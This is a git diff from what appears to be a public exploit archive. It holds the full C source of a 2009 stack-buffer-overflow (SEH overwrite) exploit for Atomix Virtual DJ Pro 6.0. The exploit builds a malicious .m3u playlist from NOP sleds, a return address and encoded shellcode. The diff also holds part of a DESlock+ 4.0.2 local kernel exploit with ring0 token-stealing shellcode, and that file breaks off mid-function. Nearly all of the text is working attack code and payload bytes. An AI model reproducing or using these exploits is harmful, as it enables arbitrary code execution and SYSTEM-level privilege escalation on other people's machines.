0x49, 0x49, 0x49, 0x49, 0x49, 0x51, 0x5A, 0x37, - 0x6A, 0x63, 0x58, 0x30, 0x42, 0x30, 0x50, 0x42, 0x6B, 0x42, 0x41, 0x73, 0x41, 0x42, 0x32, 0x42, - 0x41, 0x32, 0x41, 0x41, 0x30, 0x41, 0x41, 0x58, 0x38, 0x42, 0x42, 0x50, 0x75, 0x38, 0x69, 0x69, - 0x6C, 0x38, 0x68, 0x41, 0x54, 0x77, 0x70, 0x57, 0x70, 0x75, 0x50, 0x6E, 0x6B, 0x41, 0x55, 0x55, - 0x6C, 0x6E, 0x6B, 0x43, 0x4C, 0x66, 0x65, 0x41, 0x68, 0x45, 0x51, 0x58, 0x6F, 0x4C, 0x4B, 0x50, - 0x4F, 0x62, 0x38, 0x6E, 0x6B, 0x41, 0x4F, 0x31, 0x30, 0x36, 0x61, 0x4A, 0x4B, 
0x41, 0x59, 0x6C, - 0x4B, 0x74, 0x74, 0x6E, 0x6B, 0x44, 0x41, 0x4A, 0x4E, 0x47, 0x41, 0x4B, 0x70, 0x6F, 0x69, 0x6C, - 0x6C, 0x4C, 0x44, 0x4B, 0x70, 0x43, 0x44, 0x76, 0x67, 0x4B, 0x71, 0x4A, 0x6A, 0x66, 0x6D, 0x66, - 0x61, 0x39, 0x52, 0x5A, 0x4B, 0x4A, 0x54, 0x75, 0x6B, 0x62, 0x74, 0x56, 0x44, 0x73, 0x34, 0x41, - 0x65, 0x4B, 0x55, 0x4E, 0x6B, 0x73, 0x6F, 0x54, 0x64, 0x53, 0x31, 0x6A, 0x4B, 0x35, 0x36, 0x6C, - 0x4B, 0x64, 0x4C, 0x30, 0x4B, 0x6C, 0x4B, 0x73, 0x6F, 0x57, 0x6C, 0x75, 0x51, 0x6A, 0x4B, 0x6C, - 0x4B, 0x37, 0x6C, 0x6C, 0x4B, 0x77, 0x71, 0x68, 0x6B, 0x4C, 0x49, 0x71, 0x4C, 0x51, 0x34, 0x43, - 0x34, 0x6B, 0x73, 0x46, 0x51, 0x79, 0x50, 0x71, 0x74, 0x4C, 0x4B, 0x67, 0x30, 0x36, 0x50, 0x4C, - 0x45, 0x4B, 0x70, 0x62, 0x58, 0x74, 0x4C, 0x6C, 0x4B, 0x53, 0x70, 0x56, 0x6C, 0x4E, 0x6B, 0x34, - 0x30, 0x47, 0x6C, 0x4E, 0x4D, 0x6C, 0x4B, 0x70, 0x68, 0x37, 0x78, 0x58, 0x6B, 0x53, 0x39, 0x6C, - 0x4B, 0x4F, 0x70, 0x6C, 0x70, 0x53, 0x30, 0x43, 0x30, 0x73, 0x30, 0x6C, 0x4B, 0x42, 0x48, 0x77, - 0x4C, 0x61, 0x4F, 0x44, 0x71, 0x6B, 0x46, 0x73, 0x50, 0x72, 0x76, 0x6B, 0x39, 0x5A, 0x58, 0x6F, - 0x73, 0x4F, 0x30, 0x73, 0x4B, 0x56, 0x30, 0x31, 0x78, 0x61, 0x6E, 0x6A, 0x78, 0x4B, 0x52, 0x74, - 0x33, 0x55, 0x38, 0x4A, 0x38, 0x69, 0x6E, 0x6C, 0x4A, 0x54, 0x4E, 0x52, 0x77, 0x79, 0x6F, 0x79, - 0x77, 0x42, 0x43, 0x50, 0x61, 0x70, 0x6C, 0x41, 0x73, 0x64, 0x6E, 0x51, 0x75, 0x52, 0x58, 0x31, - 0x75, 0x57, 0x70, 0x63, 0x72, 0x20, 0x4F, 0x66, 0x20, 0x54, 0x68, 0x65, 0x20, 0x44, 0x6F, 0x67, - 0x20, 0x41, 0x67, 0x61, 0x69, 0x6E, 0x20, 0x28, 0x32, 0x30, 0x30, 0x36, 0x29, 0x5B, 0x54, 0x2D, - 0x42, 0x6F, 0x79, 0x7A, 0x5D, 0x5C, 0x31, 0x33, 0x2E, 0x20, 0x44, 0x4D, 0x58, 0x20, 0x2D, 0x20, - 0x4C, 0x69, 0x66, 0x65, 0x20, 0x62, 0x65, 0x20, 0x6D, 0x79, 0x20, 0x53, 0x6F, 0x6E, 0x67, 0x2E, - 0x6D, 0x70, 0x33, 0x0D, 0x0A, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, -} ; - - int main ( int argc, char *argv[] ) -{ if ( argc < 2) - fprintf ( stdout, "Usage is %s file.m3u\n", argv [0] ); - fprintf ( stdout ,"\tAtomix.Virtual.DJ.Pro.v6.0 STACK BUFFER OVERFLOW ( SEH OVERWRITE )\n"); - fprintf ( stdout , "\tCREDITS: fl0 fl0w\n"); - - FILE *f; f = fopen ( argv[1] , "wb" ); assert ( f != NULL ); fprintf ( f, rawData ); return 0; } - -// milw0rm.com [2009-06-03] +#include +#include +#include +#include +#include + +unsigned char rawData[] = +{ + 0x23, 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x44, 0x4A, 0x20, 0x50, 0x6C, 0x61, 0x79, 0x6C, + 0x69, 0x73, 0x74, 0x0D, 0x0A, 0x23, 0x4D, 0x69, 0x78, 0x54, 0x79, 0x70, 0x65, 0x3D, 0x53, 0x6D, + 0x61, 0x72, 0x74, 0x0D, 0x0A, 0x49, 0x3A, 0x5C, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 
0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xF0, + 0x69, 0x83, 0x7C, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0xEB, 0x03, 0x59, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x49, 0x49, 0x49, 0x49, + 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x51, 0x5A, 0x37, + 0x6A, 0x63, 0x58, 0x30, 0x42, 
0x30, 0x50, 0x42, 0x6B, 0x42, 0x41, 0x73, 0x41, 0x42, 0x32, 0x42, + 0x41, 0x32, 0x41, 0x41, 0x30, 0x41, 0x41, 0x58, 0x38, 0x42, 0x42, 0x50, 0x75, 0x38, 0x69, 0x69, + 0x6C, 0x38, 0x68, 0x41, 0x54, 0x77, 0x70, 0x57, 0x70, 0x75, 0x50, 0x6E, 0x6B, 0x41, 0x55, 0x55, + 0x6C, 0x6E, 0x6B, 0x43, 0x4C, 0x66, 0x65, 0x41, 0x68, 0x45, 0x51, 0x58, 0x6F, 0x4C, 0x4B, 0x50, + 0x4F, 0x62, 0x38, 0x6E, 0x6B, 0x41, 0x4F, 0x31, 0x30, 0x36, 0x61, 0x4A, 0x4B, 0x41, 0x59, 0x6C, + 0x4B, 0x74, 0x74, 0x6E, 0x6B, 0x44, 0x41, 0x4A, 0x4E, 0x47, 0x41, 0x4B, 0x70, 0x6F, 0x69, 0x6C, + 0x6C, 0x4C, 0x44, 0x4B, 0x70, 0x43, 0x44, 0x76, 0x67, 0x4B, 0x71, 0x4A, 0x6A, 0x66, 0x6D, 0x66, + 0x61, 0x39, 0x52, 0x5A, 0x4B, 0x4A, 0x54, 0x75, 0x6B, 0x62, 0x74, 0x56, 0x44, 0x73, 0x34, 0x41, + 0x65, 0x4B, 0x55, 0x4E, 0x6B, 0x73, 0x6F, 0x54, 0x64, 0x53, 0x31, 0x6A, 0x4B, 0x35, 0x36, 0x6C, + 0x4B, 0x64, 0x4C, 0x30, 0x4B, 0x6C, 0x4B, 0x73, 0x6F, 0x57, 0x6C, 0x75, 0x51, 0x6A, 0x4B, 0x6C, + 0x4B, 0x37, 0x6C, 0x6C, 0x4B, 0x77, 0x71, 0x68, 0x6B, 0x4C, 0x49, 0x71, 0x4C, 0x51, 0x34, 0x43, + 0x34, 0x6B, 0x73, 0x46, 0x51, 0x79, 0x50, 0x71, 0x74, 0x4C, 0x4B, 0x67, 0x30, 0x36, 0x50, 0x4C, + 0x45, 0x4B, 0x70, 0x62, 0x58, 0x74, 0x4C, 0x6C, 0x4B, 0x53, 0x70, 0x56, 0x6C, 0x4E, 0x6B, 0x34, + 0x30, 0x47, 0x6C, 0x4E, 0x4D, 0x6C, 0x4B, 0x70, 0x68, 0x37, 0x78, 0x58, 0x6B, 0x53, 0x39, 0x6C, + 0x4B, 0x4F, 0x70, 0x6C, 0x70, 0x53, 0x30, 0x43, 0x30, 0x73, 0x30, 0x6C, 0x4B, 0x42, 0x48, 0x77, + 0x4C, 0x61, 0x4F, 0x44, 0x71, 0x6B, 0x46, 0x73, 0x50, 0x72, 0x76, 0x6B, 0x39, 0x5A, 0x58, 0x6F, + 0x73, 0x4F, 0x30, 0x73, 0x4B, 0x56, 0x30, 0x31, 0x78, 0x61, 0x6E, 0x6A, 0x78, 0x4B, 0x52, 0x74, + 0x33, 0x55, 0x38, 0x4A, 0x38, 0x69, 0x6E, 0x6C, 0x4A, 0x54, 0x4E, 0x52, 0x77, 0x79, 0x6F, 0x79, + 0x77, 0x42, 0x43, 0x50, 0x61, 0x70, 0x6C, 0x41, 0x73, 0x64, 0x6E, 0x51, 0x75, 0x52, 0x58, 0x31, + 0x75, 0x57, 0x70, 0x63, 0x72, 0x20, 0x4F, 0x66, 0x20, 0x54, 0x68, 0x65, 0x20, 0x44, 0x6F, 0x67, + 0x20, 0x41, 0x67, 0x61, 0x69, 0x6E, 0x20, 0x28, 0x32, 0x30, 0x30, 
0x36, 0x29, 0x5B, 0x54, 0x2D, + 0x42, 0x6F, 0x79, 0x7A, 0x5D, 0x5C, 0x31, 0x33, 0x2E, 0x20, 0x44, 0x4D, 0x58, 0x20, 0x2D, 0x20, + 0x4C, 0x69, 0x66, 0x65, 0x20, 0x62, 0x65, 0x20, 0x6D, 0x79, 0x20, 0x53, 0x6F, 0x6E, 0x67, 0x2E, + 0x6D, 0x70, 0x33, 0x0D, 0x0A, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, +} ; + + int main ( int argc, char *argv[] ) +{ if ( argc < 2) + fprintf ( stdout, "Usage is %s file.m3u\n", argv [0] ); + fprintf ( stdout ,"\tAtomix.Virtual.DJ.Pro.v6.0 STACK BUFFER OVERFLOW ( SEH OVERWRITE )\n"); + fprintf ( stdout , "\tCREDITS: fl0 fl0w\n"); + + FILE *f; f = fopen ( argv[1] , "wb" ); assert ( f != NULL ); fprintf ( f, rawData ); return 0; } + +// milw0rm.com [2009-06-03] diff --git a/platforms/windows/local/8983.c b/platforms/windows/local/8983.c index 157811cd3..08eb76c16 100755 --- a/platforms/windows/local/8983.c +++ b/platforms/windows/local/8983.c 
@@ -1,310 +1,310 @@ -/* deslock-dlpcrypt.c - * - * Copyright (c) 2009 by - * - * DESlock+ 4.0.2 local kernel SYSTEM exploit - * by mu-b - Thu 18 Jun 2009 - * - * - Tested on: dlpcrypt.sys 0.1.1.27 - * - * .text:0001BB2E: 'what do ya want for nothing?' - * - hmmm, something that doesn't pass kernel mode pointers - * between kernel and userland? - * - * Compile: MinGW + -lntdll - * - * - Private Source Code -DO NOT DISTRIBUTE - - * http://www.digit-labs.org/ -- Digit-Labs 2009!@$! - */ - -#include -#include - -#include - -#define DLPCRYPT_IOCTL_ENABLED 0x8001200C -#define DLPCRYPT_IOCTL_ADD 0x80012004 -#define DLPCRYPT_IOCTL_PROCESS 0x80012010 - -#define DLPCRYPT_FLAG1 0x13B45FA8 -#define DLPCRYPT_FLAG2 0xBFD294C9 - -static unsigned char win32_fixup[] = - "\x56"; - -/* Win2k3 SP1/2 - kernel EPROCESS token switcher - * by mu-b - */ -static unsigned char win2k3_ring0_shell[] = - /* _ring0 */ - "\xb8\x24\xf1\xdf\xff" - "\x8b\x00" - "\x8b\xb0\x18\x02\x00\x00" - "\x89\xf0" - /* _sys_eprocess_loop */ - "\x8b\x98\x94\x00\x00\x00" - "\x81\xfb\x04\x00\x00\x00" - "\x74\x11" - "\x8b\x80\x9c\x00\x00\x00" - "\x2d\x98\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - "\xeb\x21" - /* _sys_eprocess_found */ - "\x89\xc1" - "\x89\xf0" - - /* _cmd_eprocess_loop */ - "\x8b\x98\x94\x00\x00\x00" - "\x81\xfb\x00\x00\x00\x00" - "\x74\x10" - "\x8b\x80\x9c\x00\x00\x00" - "\x2d\x98\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - /* _not_found */ - "\xcc" - /* _cmd_eprocess_found - * _ring0_end */ - - /* copy tokens!$%! 
*/ - "\x8b\x89\xd8\x00\x00\x00" - "\x89\x88\xd8\x00\x00\x00" - "\x90"; - -static unsigned char winxp_ring0_shell[] = - /* _ring0 */ - "\xb8\x24\xf1\xdf\xff" - "\x8b\x00" - "\x8b\x70\x44" - "\x89\xf0" - /* _sys_eprocess_loop */ - "\x8b\x98\x84\x00\x00\x00" - "\x81\xfb\x04\x00\x00\x00" - "\x74\x11" - "\x8b\x80\x8c\x00\x00\x00" - "\x2d\x88\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - "\xeb\x21" - /* _sys_eprocess_found */ - "\x89\xc1" - "\x89\xf0" - - /* _cmd_eprocess_loop */ - "\x8b\x98\x84\x00\x00\x00" - "\x81\xfb\x00\x00\x00\x00" - "\x74\x10" - "\x8b\x80\x8c\x00\x00\x00" - "\x2d\x88\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - /* _not_found */ - "\xcc" - /* _cmd_eprocess_found - * _ring0_end */ - - /* copy tokens!$%! */ - "\x8b\x89\xc8\x00\x00\x00" - "\x89\x88\xc8\x00\x00\x00" - "\x90"; - -static unsigned char win32_ret[] = - "\x5e" - "\x58" - "\x58" - "\x33\xc0" - "\x5e" - "\x5d" - "\xc2\x0c\x00"; - -struct ioctl_req_enable { - int flag[2]; - int len; - int result; - int enabled; - char pad[0x38 - 0x14]; -}; - -struct ioctl_req { - int flag[2]; - int len; - int result; - int action; - struct ioctl_ptr *ptr; - char pad[0x38 - 0x18]; -}; - -struct ioctl_ptr { - char pad[0x8]; - struct ioctl_pid *ppid; - int action; - char _pad[0x4]; - struct ioctl_func *func; -}; - -struct ioctl_pid { - char pad[0x14]; - DWORD pid; -}; - -struct ioctl_func { - void *func_ptr; -}; - -static PCHAR -fixup_ring0_shell (DWORD ppid, DWORD *zlen) -{ - DWORD dwVersion, dwMajorVersion, dwMinorVersion; - - dwVersion = GetVersion (); - dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion))); - dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion))); - - if (dwMajorVersion != 5) - { - fprintf (stderr, "* GetVersion, unsupported version\n"); - exit (EXIT_FAILURE); - } - - switch (dwMinorVersion) - { - case 1: - *zlen = sizeof winxp_ring0_shell - 1; - *(PDWORD) 